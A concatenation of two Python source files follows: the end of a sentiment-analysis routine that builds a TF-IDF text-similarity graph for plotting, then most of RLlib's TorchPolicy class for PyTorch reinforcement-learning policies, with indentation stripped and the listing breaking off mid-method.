outputs[i]['avg_irony'] = avg_irony.tolist()
outputs[i]['avg_bias'] = avg_bias.tolist()
# graph pipeline
df = pd.DataFrame({'text':df_texts,'sentiment':df_sentiments})
df['id'] = df.index
tfidf = TfidfVectorizer(stop_words='english',norm='l2')
DxT = tfidf.fit_transform(df['text'])
DxD = np.dot(DxT,DxT.T)
G = nx.Graph()
for i in range(df.shape[0]):
idx = df.at[i,'id']
text = df.at[i,'text']
sentiment = df.at[i,'sentiment']
G.add_node(idx,text=text,sentiment=sentiment)
dense_DxD = DxD.toarray()
len_dense = len(dense_DxD)
cutoff=0
for i in range(len_dense):
for j in range(i+1,len_dense):
if dense_DxD[i,j]>=cutoff:
weight=dense_DxD[i,j]
G.add_edge(df.at[i,'id'],df.at[j,'id'],weight=weight)
for node,degree in list(dict(G.degree()).items()):
if degree == 0:
G.remove_node(node)
pos = nxlayout.fruchterman_reingold_layout(G,k=1.5/np.sqrt(len(G.nodes())))
edge_data = []
colors = {0:'1',1:'2'}
for u,v,w in G.edges(data=True):
x0,y0 = pos[u]
x1,y1 = pos[v]
w = w['weight']
edge_data.append(go.Scatter(x=[x0,x1,None],
y=[y0,y1,None],
line=go.Line(width=3.0*w,color='#888'),
hoverinfo='none',
mode='lines'))
node_data = go.Scatter(
x=[],
y=[],
text=[],
mode='markers',
hoverinfo='text',
marker=go.Marker(
showscale=True,
reversescale=True,
color=[],
size=5.0,
colorbar=dict(
thickness=15,
xanchor='left',
tickmode='array',
tickvals=[1,2],
ticktext=['negative','positive'],
ticks = 'outside'
),
line=dict(width=0.5)))
for u,w in G.nodes(data=True):
x,y = pos[u]
color = colors[w['sentiment']]
text = w['text']
node_data['x'].append(x)
node_data['y'].append(y)
node_data['text'].append(text)
node_data['marker']['color'].append(color)
# end graph pipeline
overall_unique, overall_count = np.unique(overall_local_entities_nouns, return_counts = True)
overall_unique = overall_unique[np.argsort(overall_count)[::-1]][:200].tolist()
overall_count = overall_count[np.argsort(overall_count)[::-1]][:200].tolist()
return {'overall_sentiment': np.array(overall_sentiment).mean(axis = 0).tolist(),
'overall_emotion': np.array(overall_emotion).mean(axis = 0).tolist(),
'overall_msg': np.array(overall_msg).mean(axis = 0).tolist(),
'overall_subjectivity': np.array(overall_subj).mean().tolist(),
'overall_polarity': np.array(overall_pol).mean().tolist(),
'overall_irony': np.array(overall_irony).mean().tolist(),
'overall_bias': np.array(overall_bias).mean().tolist(),
'person': list(set(persons)),
'org': list(set(orgs)),
'gpe': list(set(gpes)),
'outputs': outputs,
'wordcloud':list(zip(overall_unique, overall_count)),
'sentiment-network':edge_data+[node_data]}
|
torch_policy.py
|
import copy
import functools
import gym
import logging
import math
import numpy as np
import os
import threading
import time
import tree # pip install dm_tree
from typing import (
Any,
Callable,
Dict,
List,
Optional,
Set,
Tuple,
Type,
Union,
TYPE_CHECKING,
)
import ray
from ray.rllib.models.catalog import ModelCatalog
from ray.rllib.models.modelv2 import ModelV2
from ray.rllib.models.torch.torch_action_dist import TorchDistributionWrapper
from ray.rllib.models.torch.torch_modelv2 import TorchModelV2
from ray.rllib.policy.policy import Policy
from ray.rllib.policy.rnn_sequencing import pad_batch_to_sequences_of_same_size
from ray.rllib.policy.sample_batch import SampleBatch
from ray.rllib.utils import force_list, NullContextManager
from ray.rllib.utils.annotations import DeveloperAPI, override
from ray.rllib.utils.framework import try_import_torch
from ray.rllib.utils.metrics import NUM_AGENT_STEPS_TRAINED
from ray.rllib.utils.metrics.learner_info import LEARNER_STATS_KEY
from ray.rllib.utils.numpy import convert_to_numpy
from ray.rllib.utils.spaces.space_utils import normalize_action
from ray.rllib.utils.threading import with_lock
from ray.rllib.utils.torch_utils import convert_to_torch_tensor
from ray.rllib.utils.typing import (
GradInfoDict,
ModelGradients,
ModelWeights,
TensorType,
TensorStructType,
AlgorithmConfigDict,
)
if TYPE_CHECKING:
from ray.rllib.evaluation import Episode # noqa
torch, nn = try_import_torch()
logger = logging.getLogger(__name__)
@DeveloperAPI
class TorchPolicy(Policy):
"""PyTorch specific Policy class to use with RLlib."""
@DeveloperAPI
def __init__(
self,
observation_space: gym.spaces.Space,
action_space: gym.spaces.Space,
config: AlgorithmConfigDict,
*,
model: Optional[TorchModelV2] = None,
loss: Optional[
Callable[
[Policy, ModelV2, Type[TorchDistributionWrapper], SampleBatch],
Union[TensorType, List[TensorType]],
]
] = None,
action_distribution_class: Optional[Type[TorchDistributionWrapper]] = None,
action_sampler_fn: Optional[
Callable[
[TensorType, List[TensorType]],
Union[
Tuple[TensorType, TensorType, List[TensorType]],
Tuple[TensorType, TensorType, TensorType, List[TensorType]],
],
]
] = None,
action_distribution_fn: Optional[
Callable[
[Policy, ModelV2, TensorType, TensorType, TensorType],
Tuple[TensorType, Type[TorchDistributionWrapper], List[TensorType]],
]
] = None,
max_seq_len: int = 20,
get_batch_divisibility_req: Optional[Callable[[Policy], int]] = None,
):
"""Initializes a TorchPolicy instance.
Args:
observation_space: Observation space of the policy.
action_space: Action space of the policy.
config: The Policy's config dict.
model: PyTorch policy module. Given observations as
input, this module must return a list of outputs where the
first item is action logits, and the rest can be any value.
loss: Callable that returns one or more (a list of) scalar loss
terms.
action_distribution_class: Class for a torch action distribution.
action_sampler_fn: A callable returning either a sampled action,
its log-likelihood and updated state or a sampled action, its
log-likelihood, updated state and action distribution inputs
given Policy, ModelV2, input_dict, state batches (optional),
explore, and timestep. Provide `action_sampler_fn` if you would
like to have full control over the action computation step,
including the model forward pass, possible sampling from a
distribution, and exploration logic.
Note: If `action_sampler_fn` is given, `action_distribution_fn`
must be None. If both `action_sampler_fn` and
`action_distribution_fn` are None, RLlib will simply pass
inputs through `self.model` to get distribution inputs, create
the distribution object, sample from it, and apply some
exploration logic to the results.
The callable takes as inputs: Policy, ModelV2, input_dict
(SampleBatch), state_batches (optional), explore, and timestep.
action_distribution_fn: A callable returning distribution inputs
(parameters), a dist-class to generate an action distribution
object from, and internal-state outputs (or an empty list if
not applicable).
Provide `action_distribution_fn` if you would like to only
customize the model forward pass call. The resulting
distribution parameters are then used by RLlib to create a
distribution object, sample from it, and execute any
exploration logic.
Note: If `action_distribution_fn` is given, `action_sampler_fn`
must be None. If both `action_sampler_fn` and
`action_distribution_fn` are None, RLlib will simply pass
inputs through `self.model` to get distribution inputs, create
the distribution object, sample from it, and apply some
exploration logic to the results.
The callable takes as inputs: Policy, ModelV2, ModelInputDict,
explore, timestep, is_training.
max_seq_len: Max sequence length for LSTM training.
get_batch_divisibility_req: Optional callable that returns the
divisibility requirement for sample batches given the Policy.
"""
self.framework = config["framework"] = "torch"
super().__init__(observation_space, action_space, config)
# Create multi-GPU model towers, if necessary.
# - The central main model will be stored under self.model, residing
# on self.device (normally, a CPU).
# - Each GPU will have a copy of that model under
# self.model_gpu_towers, matching the devices in self.devices.
# - Parallelization is done by splitting the train batch and passing
# it through the model copies in parallel, then averaging over the
# resulting gradients, applying these averages on the main model and
# updating all towers' weights from the main model.
# - In case of just one device (1 (fake or real) GPU or 1 CPU), no
# parallelization will be done.
# If no Model is provided, build a default one here.
if model is None:
dist_class, logit_dim = ModelCatalog.get_action_dist(
action_space, self.config["model"], framework=self.framework
)
model = ModelCatalog.get_model_v2(
obs_space=self.observation_space,
action_space=self.action_space,
num_outputs=logit_dim,
model_config=self.config["model"],
framework=self.framework,
)
if action_distribution_class is None:
action_distribution_class = dist_class
# Get devices to build the graph on.
worker_idx = self.config.get("worker_index", 0)
if not config["_fake_gpus"] and ray.worker._mode() == ray.worker.LOCAL_MODE:
num_gpus = 0
elif worker_idx == 0:
num_gpus = config["num_gpus"]
else:
num_gpus = config["num_gpus_per_worker"]
gpu_ids = list(range(torch.cuda.device_count()))
# Place on one or more CPU(s) when either:
# - Fake GPU mode.
# - num_gpus=0 (either set by user or we are in local_mode=True).
# - No GPUs available.
if config["_fake_gpus"] or num_gpus == 0 or not gpu_ids:
logger.info(
"TorchPolicy (worker={}) running on {}.".format(
worker_idx if worker_idx > 0 else "local",
"{} fake-GPUs".format(num_gpus) if config["_fake_gpus"] else "CPU",
)
)
self.device = torch.device("cpu")
self.devices = [self.device for _ in range(int(math.ceil(num_gpus)) or 1)]
self.model_gpu_towers = [
model if i == 0 else copy.deepcopy(model)
for i in range(int(math.ceil(num_gpus)) or 1)
]
if hasattr(self, "target_model"):
self.target_models = {
m: self.target_model for m in self.model_gpu_towers
}
self.model = model
# Place on one or more actual GPU(s), when:
# - num_gpus > 0 (set by user) AND
# - local_mode=False AND
# - actual GPUs available AND
# - non-fake GPU mode.
else:
logger.info(
"TorchPolicy (worker={}) running on {} GPU(s).".format(
worker_idx if worker_idx > 0 else "local", num_gpus
)
)
# We are a remote worker (WORKER_MODE=1):
# GPUs should be assigned to us by ray.
if ray.worker._mode() == ray.worker.WORKER_MODE:
gpu_ids = ray.get_gpu_ids()
if len(gpu_ids) < num_gpus:
raise ValueError(
"TorchPolicy was not able to find enough GPU IDs! Found "
f"{gpu_ids}, but num_gpus={num_gpus}."
)
self.devices = [
torch.device("cuda:{}".format(i))
for i, id_ in enumerate(gpu_ids)
if i < num_gpus
]
self.device = self.devices[0]
ids = [id_ for i, id_ in enumerate(gpu_ids) if i < num_gpus]
self.model_gpu_towers = []
for i, _ in enumerate(ids):
model_copy = copy.deepcopy(model)
self.model_gpu_towers.append(model_copy.to(self.devices[i]))
if hasattr(self, "target_model"):
self.target_models = {
m: copy.deepcopy(self.target_model).to(self.devices[i])
for i, m in enumerate(self.model_gpu_towers)
}
self.model = self.model_gpu_towers[0]
# Lock used for locking some methods on the object-level.
# This prevents possible race conditions when calling the model
# first, then its value function (e.g. in a loss function), in
# between of which another model call is made (e.g. to compute an
# action).
self._lock = threading.RLock()
self._state_inputs = self.model.get_initial_state()
self._is_recurrent = len(self._state_inputs) > 0
# Auto-update model's inference view requirements, if recurrent.
self._update_model_view_requirements_from_init_state()
# Combine view_requirements for Model and Policy.
self.view_requirements.update(self.model.view_requirements)
self.exploration = self._create_exploration()
self.unwrapped_model = model # used to support DistributedDataParallel
# To ensure backward compatibility:
# Old way: If `loss` provided here, use as-is (as a function).
if loss is not None:
self._loss = loss
# New way: Convert the overridden `self.loss` into a plain function,
# so it can be called the same way as `loss` would be, ensuring
# backward compatibility.
elif self.loss.__func__.__qualname__ != "Policy.loss":
self._loss = self.loss.__func__
# `loss` not provided nor overridden from Policy -> Set to None.
else:
self._loss = None
self._optimizers = force_list(self.optimizer())
# Store, which params (by index within the model's list of
# parameters) should be updated per optimizer.
# Maps optimizer idx to set or param indices.
self.multi_gpu_param_groups: List[Set[int]] = []
main_params = {p: i for i, p in enumerate(self.model.parameters())}
for o in self._optimizers:
param_indices = []
for pg_idx, pg in enumerate(o.param_groups):
for p in pg["params"]:
param_indices.append(main_params[p])
self.multi_gpu_param_groups.append(set(param_indices))
# Create n sample-batch buffers (num_multi_gpu_tower_stacks), each
# one with m towers (num_gpus).
num_buffers = self.config.get("num_multi_gpu_tower_stacks", 1)
self._loaded_batches = [[] for _ in range(num_buffers)]
self.dist_class = action_distribution_class
self.action_sampler_fn = action_sampler_fn
self.action_distribution_fn = action_distribution_fn
# If set, means we are using distributed allreduce during learning.
self.distributed_world_size = None
self.max_seq_len = max_seq_len
self.batch_divisibility_req = (
get_batch_divisibility_req(self)
if callable(get_batch_divisibility_req)
else (get_batch_divisibility_req or 1)
)
@override(Policy)
def compute_actions_from_input_dict(
self,
input_dict: Dict[str, TensorType],
explore: bool = None,
timestep: Optional[int] = None,
**kwargs,
) -> Tuple[TensorType, List[TensorType], Dict[str, TensorType]]:
with torch.no_grad():
# Pass lazy (torch) tensor dict to Model as `input_dict`.
input_dict = self._lazy_tensor_dict(input_dict)
input_dict.set_training(True)
# Pack internal state inputs into (separate) list.
state_batches = [
input_dict[k] for k in input_dict.keys() if "state_in" in k[:8]
]
# Calculate RNN sequence lengths.
seq_lens = (
torch.tensor(
[1] * len(state_batches[0]),
dtype=torch.long,
device=state_batches[0].device,
)
if state_batches
else None
)
return self._compute_action_helper(
input_dict, state_batches, seq_lens, explore, timestep
)
@override(Policy)
@DeveloperAPI
def compute_actions(
self,
obs_batch: Union[List[TensorStructType], TensorStructType],
state_batches: Optional[List[TensorType]] = None,
prev_action_batch: Union[List[TensorStructType], TensorStructType] = None,
prev_reward_batch: Union[List[TensorStructType], TensorStructType] = None,
info_batch: Optional[Dict[str, list]] = None,
episodes: Optional[List["Episode"]] = None,
explore: Optional[bool] = None,
timestep: Optional[int] = None,
**kwargs,
) -> Tuple[TensorStructType, List[TensorType], Dict[str, TensorType]]:
with torch.no_grad():
seq_lens = torch.ones(len(obs_batch), dtype=torch.int32)
input_dict = self._lazy_tensor_dict(
{
SampleBatch.CUR_OBS: obs_batch,
"is_training": False,
}
)
if prev_action_batch is not None:
input_dict[SampleBatch.PREV_ACTIONS] = np.asarray(prev_action_batch)
if prev_reward_batch is not None:
input_dict[SampleBatch.PREV_REWARDS] = np.asarray(prev_reward_batch)
state_batches = [
convert_to_torch_tensor(s, self.device) for s in (state_batches or [])
]
return self._compute_action_helper(
input_dict, state_batches, seq_lens, explore, timestep
)
@with_lock
@override(Policy)
@DeveloperAPI
def compute_log_likelihoods(
self,
actions: Union[List[TensorStructType], TensorStructType],
obs_batch: Union[List[TensorStructType], TensorStructType],
state_batches: Optional[List[TensorType]] = None,
prev_action_batch: Optional[
Union[List[TensorStructType], TensorStructType]
] = None,
prev_reward_batch: Optional[
Union[List[TensorStructType], TensorStructType]
] = None,
actions_normalized: bool = True,
) -> TensorType:
if self.action_sampler_fn and self.action_distribution_fn is None:
raise ValueError(
"Cannot compute log-prob/likelihood w/o an "
"`action_distribution_fn` and a provided "
"`action_sampler_fn`!"
)
with torch.no_grad():
input_dict = self._lazy_tensor_dict(
{SampleBatch.CUR_OBS: obs_batch, SampleBatch.ACTIONS: actions}
)
if prev_action_batch is not None:
input_dict[SampleBatch.PREV_ACTIONS] = prev_action_batch
if prev_reward_batch is not None:
input_dict[SampleBatch.PREV_REWARDS] = prev_reward_batch
seq_lens = torch.ones(len(obs_batch), dtype=torch.int32)
state_batches = [
convert_to_torch_tensor(s, self.device) for s in (state_batches or [])
]
# Exploration hook before each forward pass.
self.exploration.before_compute_actions(explore=False)
# Action dist class and inputs are generated via custom function.
if self.action_distribution_fn:
# Try new action_distribution_fn signature, supporting
# state_batches and seq_lens.
try:
dist_inputs, dist_class, state_out = self.action_distribution_fn(
self,
self.model,
input_dict=input_dict,
state_batches=state_batches,
seq_lens=seq_lens,
explore=False,
is_training=False,
)
# Trying the old way (to stay backward compatible).
# TODO: Remove in future.
except TypeError as e:
if (
"positional argument" in e.args[0]
or "unexpected keyword argument" in e.args[0]
):
dist_inputs, dist_class, _ = self.action_distribution_fn(
policy=self,
model=self.model,
obs_batch=input_dict[SampleBatch.CUR_OBS],
explore=False,
is_training=False,
)
else:
raise e
# Default action-dist inputs calculation.
else:
dist_class = self.dist_class
dist_inputs, _ = self.model(input_dict, state_batches, seq_lens)
action_dist = dist_class(dist_inputs, self.model)
# Normalize actions if necessary.
actions = input_dict[SampleBatch.ACTIONS]
if not actions_normalized and self.config["normalize_actions"]:
actions = normalize_action(actions, self.action_space_struct)
log_likelihoods = action_dist.logp(actions)
return log_likelihoods
@with_lock
@override(Policy)
@DeveloperAPI
def learn_on_batch(self, postprocessed_batch: SampleBatch) -> Dict[str, TensorType]:
# Set Model to train mode.
if self.model:
self.model.train()
# Callback handling.
learn_stats = {}
self.callbacks.on_learn_on_batch(
policy=self, train_batch=postprocessed_batch, result=learn_stats
)
# Compute gradients (will calculate all losses and `backward()`
# them to get the grads).
grads, fetches = self.compute_gradients(postprocessed_batch)
# Step the optimizers.
self.apply_gradients(_directStepOptimizerSingleton)
if self.model:
fetches["model"] = self.model.metrics()
fetches.update(
{
"custom_metrics": learn_stats,
NUM_AGENT_STEPS_TRAINED: postprocessed_batch.count,
}
)
return fetches
@override(Policy)
@DeveloperAPI
def load_batch_into_buffer(
self,
batch: SampleBatch,
buffer_index: int = 0,
) -> int:
# Set the is_training flag of the batch.
batch.set_training(True)
# Shortcut for 1 CPU only: Store batch in `self._loaded_batches`.
if len(self.devices) == 1 and self.devices[0].type == "cpu":
assert buffer_index == 0
pad_batch_to_sequences_of_same_size(
batch=batch,
max_seq_len=self.max_seq_len,
shuffle=False,
batch_divisibility_req=self.batch_divisibility_req,
view_requirements=self.view_requirements,
)
self._lazy_tensor_dict(batch)
self._loaded_batches[0] = [batch]
return len(batch)
# Batch (len=28, seq-lens=[4, 7, 4, 10, 3]):
# 0123 0123456 0123 0123456789ABC
# 1) split into n per-GPU sub batches (n=2).
# [0123 0123456] [012] [3 0123456789 ABC]
# (len=14, 14 seq-lens=[4, 7, 3] [1, 10, 3])
slices = batch.timeslices(num_slices=len(self.devices))
# 2) zero-padding (max-seq-len=10).
# - [0123000000 0123456000 0120000000]
# - [3000000000 0123456789 ABC0000000]
for slice in slices:
pad_batch_to_sequences_of_same_size(
batch=slice,
max_seq_len=self.max_seq_len,
shuffle=False,
batch_divisibility_req=self.batch_divisibility_req,
view_requirements=self.view_requirements,
)
# 3) Load splits into the given buffer (consisting of n GPUs).
slices = [slice.to_device(self.devices[i]) for i, slice in enumerate(slices)]
self._loaded_batches[buffer_index] = slices
# Return loaded samples per-device.
return len(slices[0])
@override(Policy)
@DeveloperAPI
def get_num_samples_loaded_into_buffer(self, buffer_index: int = 0) -> int:
if len(self.devices) == 1 and self.devices[0] == "/cpu:0":
assert buffer_index == 0
return sum(len(b) for b in self._loaded_batches[buffer_index])
@override(Policy)
@DeveloperAPI
def learn_on_loaded_batch(self, offset: int = 0, buffer_index: int = 0):
if not self._loaded_batches[buffer_index]:
raise ValueError(
"Must call Policy.load_batch_into_buffer() before "
"Policy.learn_on_loaded_batch()!"
)
# Get the correct slice of the already loaded batch to use,
# based on offset and batch size.
device_batch_size = self.config.get(
"sgd_minibatch_size", self.config["train_batch_size"]
) // len(self.devices)
# Set Model to train mode.
if self.model_gpu_towers:
for t in self.model_gpu_towers:
t.train()
# Shortcut for 1 CPU only: Batch should already be stored in
# `self._loaded_batches`.
if len(self.devices) == 1 and self.devices[0].type == "cpu":
assert buffer_index == 0
if device_batch_size >= len(self._loaded_batches[0][0]):
batch = self._loaded_batches[0][0]
else:
batch = self._loaded_batches[0][0][offset : offset + device_batch_size]
return self.learn_on_batch(batch)
if len(self.devices) > 1:
# Copy weights of main model (tower-0) to all other towers.
state_dict = self.model.state_dict()
# Just making sure tower-0 is really the same as self.model.
assert self.model_gpu_towers[0] is self.model
for tower in self.model_gpu_towers[1:]:
tower.load_state_dict(state_dict)
if device_batch_size >= sum(len(s) for s in self._loaded_batches[buffer_index]):
device_batches = self._loaded_batches[buffer_index]
else:
device_batches = [
b[offset : offset + device_batch_size]
for b in self._loaded_batches[buffer_index]
]
# Callback handling.
batch_fetches = {}
for i, batch in enumerate(device_batches):
custom_metrics = {}
self.callbacks.on_learn_on_batch(
policy=self, train_batch=batch, result=custom_metrics
)
batch_fetches[f"tower_{i}"] = {"custom_metrics": custom_metrics}
# Do the (maybe parallelized) gradient calculation step.
tower_outputs = self._multi_gpu_parallel_grad_calc(device_batches)
# Mean-reduce gradients over GPU-towers (do this on CPU: self.device).
all_grads = []
for i in range(len(tower_outputs[0][0])):
if tower_outputs[0][0][i] is not None:
all_grads.append(
torch.mean(
torch.stack([t[0][i].to(self.device) for t in tower_outputs]),
dim=0,
)
)
else:
all_grads.append(None)
# Set main model's grads to mean-reduced values.
for i, p in enumerate(self.model.parameters()):
p.grad = all_grads[i]
self.apply_gradients(_directStepOptimizerSingleton)
for i, (model, batch) in enumerate(zip(self.model_gpu_towers, device_batches)):
batch_fetches[f"tower_{i}"].update(
{
LEARNER_STATS_KEY: self.extra_grad_info(batch),
"model": model.metrics(),
}
)
batch_fetches.update(self.extra_compute_grad_fetches())
return batch_fetches
@with_lock
@override(Policy)
@DeveloperAPI
def compute_gradients(self, postprocessed_batch: SampleBatch) -> ModelGradients:
assert len(self.devices) == 1
# If not done yet, see whether we have to zero-pad this batch.
if not postprocessed_batch.zero_padded:
pad_batch_to_sequences_of_same_size(
batch=postprocessed_batch,
max_seq_len=self.max_seq_len,
shuffle=False,
batch_divisibility_req=self.batch_divisibility_req,
view_requirements=self.view_requirements,
)
postprocessed_batch.set_training(True)
self._lazy_tensor_dict(postprocessed_batch, device=self.devices[0])
# Do the (maybe parallelized) gradient calculation step.
tower_outputs = self._multi_gpu_parallel_grad_calc([postprocessed_batch])
all_grads, grad_info = tower_outputs[0]
grad_info["allreduce_latency"] /= len(self._optimizers)
grad_info.update(self.extra_grad_info(postprocessed_batch))
fetches = self.extra_compute_grad_fetches()
return all_grads, dict(fetches, **{LEARNER_STATS_KEY: grad_info})
@override(Policy)
@DeveloperAPI
def apply_gradients(self, gradients: ModelGradients) -> None:
if gradients == _directStepOptimizerSingleton:
for i, opt in enumerate(self._optimizers):
opt.step()
else:
# TODO(sven): Not supported for multiple optimizers yet.
assert len(self._optimizers) == 1
for g, p in zip(gradients, self.model.parameters()):
if g is not None:
if torch.is_tensor(g):
p.grad = g.to(self.device)
else:
p.grad = torch.from_numpy(g).to(self.device)
self._optimizers[0].step()
@DeveloperAPI
def get_tower_stats(self, stats_name: str) -> List[TensorStructType]:
"""Returns list of per-tower stats, copied to this Policy's device.
Args:
stats_name: The name of the stats to average over (this str
must exist as a key inside each tower's `tower_stats` dict).
Returns:
The list of stats tensor (structs) of all towers, copied to this
Policy's device.
Raises:
AssertionError: If the `stats_name` cannot be found in any one
of the tower's `tower_stats` dicts.
"""
data = []
for tower in self.model_gpu_towers:
if stats_name in tower.tower_stats:
data.append(
tree.map_structure(
lambda s: s.to(self.device), tower.tower_stats[stats_name]
)
)
assert len(data) > 0, (
f"Stats `{stats_name}` not found in any of the towers (you have "
f"{len(self.model_gpu_towers)} towers in total)! Make "
"sure you call the loss function on at least one of the towers."
)
return data
@override(Policy)
@DeveloperAPI
def get_weights(self) -> ModelWeights:
return {k: v.cpu().detach().numpy() for k, v in self.model.state_dict().items()}
@override(Policy)
@DeveloperAPI
def set_weights(self, weights: ModelWeights) -> None:
weights = convert_to_torch_tensor(weights, device=self.device)
self.model.load_state_dict(weights)
@override(Policy)
@DeveloperAPI
def is_recurrent(self) -> bool:
return self._is_recurrent
@override(Policy)
@DeveloperAPI
def num_state_tensors(self) -> int:
return len(self.model.get_initial_state())
@override(Policy)
@DeveloperAPI
def get_initial_state(self) -> List[TensorType]:
return [s.detach().cpu().numpy() for s in self.model.get_initial_state()]
@override(Policy)
@DeveloperAPI
def get_state(self) -> Union[Dict[str, TensorType], List[TensorType]]:
state = super().get_state()
state["_optimizer_variables"] = []
for i, o in enumerate(self._optimizers):
optim_state_dict = convert_to_numpy(o.state_dict())
state["_optimizer_variables"].append(optim_state_dict)
# Add exploration state.
state["_exploration_state"] = self.exploration.get_state()
return state
@override(Policy)
@DeveloperAPI
def set_state(self, state: dict) -> None:
# Set optimizer vars first.
optimizer_vars = state.get("_optimizer_variables", None)
if optimizer_vars:
assert len(optimizer_vars) == len(self._optimizers)
for o, s in zip(self._optimizers, optimizer_vars):
optim_state_dict = convert_to_torch_tensor(s, device=self.device)
o.load_state_dict(optim_state_dict)
# Set exploration's state.
if hasattr(self, "exploration") and "_exploration_state" in state:
self.exploration.set_state(state=state["_exploration_state"])
# Then the Policy's (NN) weights.
super().set_state(state)
@DeveloperAPI
def extra_grad_process(
self, optimizer: "torch.optim.Optimizer", loss: TensorType
) -> Dict[str, TensorType]:
"""Called after each optimizer.zero_grad() + loss.backward() call.
Called for each self._optimizers/loss-value pair.
Allows for gradient processing before optimizer.step() is called.
E.g. for gradient clipping.
Args:
optimizer: A torch optimizer object.
loss: The loss tensor associated with the optimizer.
Returns:
An dict with information on the gradient processing step.
"""
return {}
@DeveloperAPI
def extra_compute_grad_fetches(self) -> Dict[str, Any]:
"""Extra values to fetch and return from compute_gradients().
Returns:
Extra fetch dict to be added to the fetch dict of the
`compute_gradients` call.
"""
return {LEARNER_STATS_KEY: {}} # e.g, stats, td error, etc.
@DeveloperAPI
def extra_action_out(
self,
input_dict: Dict[str, TensorType],
state_batches: List[TensorType],
model: TorchModelV2,
action_dist: TorchDistributionWrapper,
) -> Dict[str, TensorType]:
"""Returns dict of extra info to include in experience batch.
Args:
input_dict: Dict of model input tensors.
state_batches: List of state tensors.
model: Reference to the model object.
action_dist: Torch action dist object
to get log-probs (e.g. for already sampled actions).
Returns:
Extra outputs to return in a `compute_actions_from_input_dict()`
call (3rd return value).
"""
return {}
@DeveloperAPI
def extra_grad_info(self, train_batch: SampleBatch) -> Dict[str, TensorType]:
"""Return dict of extra grad info.
Args:
train_batch: The training batch for which to produce
extra grad info for.
Returns:
The info dict carrying grad info per str key.
"""
return {}
@DeveloperAPI
def optimizer(
self,
) -> Union[List["torch.optim.Optimizer"], "torch.optim.Optimizer"]:
"""Custom the local PyTorch optimizer(s) to use.
Returns:
The local PyTorch optimizer(s) to use for this Policy.
"""
if hasattr(self, "config"):
optimizers = [
torch.optim.Adam(self.model.parameters(), lr=self.config["lr"])
]
else:
optimizers = [torch.optim.Adam(self.model.parameters())]
if getattr(self, "exploration", None):
optimizers = self.exploration.get_exploration_optimizer(optimizers)
return optimizers
@override(Policy)
@DeveloperAPI
def export_model(self, export_dir: str, onnx: Optional[int] = None) -> None:
"""Exports the Policy's Model to local directory for serving.
Creates a TorchScript model and saves it.
Args:
export_dir: Local writable directory or filename.
onnx: If given, will export model in ONNX format. The
value of this parameter set the ONNX OpSet version to use.
"""
self._lazy_tensor_dict(self._dummy_batch)
# Provide dummy state inputs if not an RNN (torch cannot jit with
# returned empty internal states list).
if "state_in_0" not in self._dummy_batch:
self._dummy_batch["state_in_0"] = self._dummy_batch[
SampleBatch.SEQ_LENS
] = np.array([1.0])
state_ins = []
i = 0
while "state_in_{}".format(i) in self._dummy_batch:
state_ins.append(self._dummy_batch["state_in_{}".format(i)])
i += 1
dummy_inputs = {
k: self._dummy_batch[k]
for k in self._dummy_batch.keys()
if k != "is_training"
}
if not os.path.exists(export_dir):
os.makedirs(export_dir)
seq_lens = self._dummy_batch[SampleBatch.SEQ_LENS]
if onnx:
file_name = os.path.join(export_dir, "model.onnx")
torch.onnx.export(
self.model,
(dummy_inputs, state_ins, seq_lens),
file_name,
export_params=True,
opset_version=onnx,
do_constant_folding=True,
input_names=list(dummy_inputs.keys())
+ ["state_ins", SampleBatch.SEQ_LENS],
output_names=["output", "state_outs"],
dynamic_axes={
k: {0: "batch_size"}
for k in list(dummy_inputs.keys())
+ ["state_ins", SampleBatch.SEQ_LENS]
},
)
else:
traced = torch.jit.trace(self.model, (dummy_inputs, state_ins, seq_lens))
file_name = os.path.join(export_dir, "model.pt")
traced.save(file_name)
@override(Policy)
def export_checkpoint(self, export_dir: str) -> None:
raise NotImplementedError
@override(Policy)
@DeveloperAPI
def import_model_from_h5(self, import_file: str) -> None:
"""Imports weights into torch model."""
return self.model.import_from_h5(import_file)
@with_lock
def _compute_action_helper(
self, input_dict, state_batches, seq_lens, explore, timestep
):
"""Shared forward pass logic (w/ and w/o trajectory view API).
Returns:
A tuple consisting of a) actions, b) state_out, c) extra_fetches.
"""
explore = explore if explore is not None else self.config["explore"]
timestep = timestep if timestep is not None else self.global_timestep
self._is_recurrent = state_batches is not None and state_batches != []
# Switch to eval mode.
if self.model:
self.model.eval()
if self.action_sampler_fn:
action_dist = dist_inputs = None
action_sampler_outputs = self.action_sampler_fn(
self,
self.model,
input_dict,
state_batches,
explore=explore,
timestep=timestep,
)
if len(action_sampler_outputs) == 4:
actions, logp, dist_inputs, state_out = action_sampler_outputs
else:
actions, logp, state_out = action_sampler_outputs
else:
# Call the exploration before_compute_actions hook.
self.exploration.before_compute_actions(explore=explore, timestep=timestep)
if self.action_distribution_fn:
# Try new action_distribution_fn signature, supporting
# state_batches and seq_lens.
try:
dist_inputs, dist_class, state_out = self.action_distribution_fn(
self,
self.model,
input_dict=input_dict,
state_batches=state_batches,
seq_lens=seq_lens,
explore=explore,
timestep=timestep,
is_training=False,
)
# Trying the old way (to stay backward compatible).
# TODO: Remove in future.
except TypeError as e:
if (
"positional argument" in e.args[0]
or "unexpected keyword argument" in e.args[0]
):
(
dist_inputs,
dist_class,
state_out,
) = self.action_distribution_fn(
self,
self.model,
input_dict[SampleBatch.CUR_OBS],
explore=explore,
timestep=timestep,
is_training=False,
)
else:
raise e
else:
dist_class = self.dist_class
dist_inputs, state_out = self.model(input_dict, state_batches, seq_lens)
if not (
isinstance(dist_class, functools.partial)
or issubclass(dist_class, TorchDistributionWrapper)
):
raise ValueError(
"`dist_class` ({}) not a TorchDistributionWrapper "
"subclass! Make sure your `action_distribution_fn` or "
"`make_model_and_action_dist` return a correct "
"distribution class.".format(dist_class.__name__)
)
action_dist = dist_class(dist_inputs, self.model)
# Get the exploration action from the forward results.
actions, logp = self.exploration.get_exploration_action(
action_distribution=action_dist, timestep=timestep, explore=explore
)
input_dict[SampleBatch.ACTIONS] = actions
# Add default and custom fetches.
extra_fetches = self.extra_action_out(
input_dict, state_batches, self.model, action_dist
)
# Action-dist inputs.
if dist_inputs is not None:
extra_fetches[SampleBatch.ACTION_DIST_INPUTS] = dist_inputs
# Action-logp and action-prob.
if logp is not None:
extra_fetches[SampleBatch.ACTION_PROB] = torch.exp(logp.float())
extra_fetches[SampleBatch.ACTION_LOGP] = logp
# Update our global timestep by the batch size.
self.global_timestep += len(input_dict[SampleBatch.CUR_OBS])
return convert_to_numpy((actions, state_out, extra_fetches))
def _lazy_tensor_dict(self, postprocessed_batch: SampleBatch, device=None):
# TODO: (sven): Keep for a while to ensure backward compatibility.
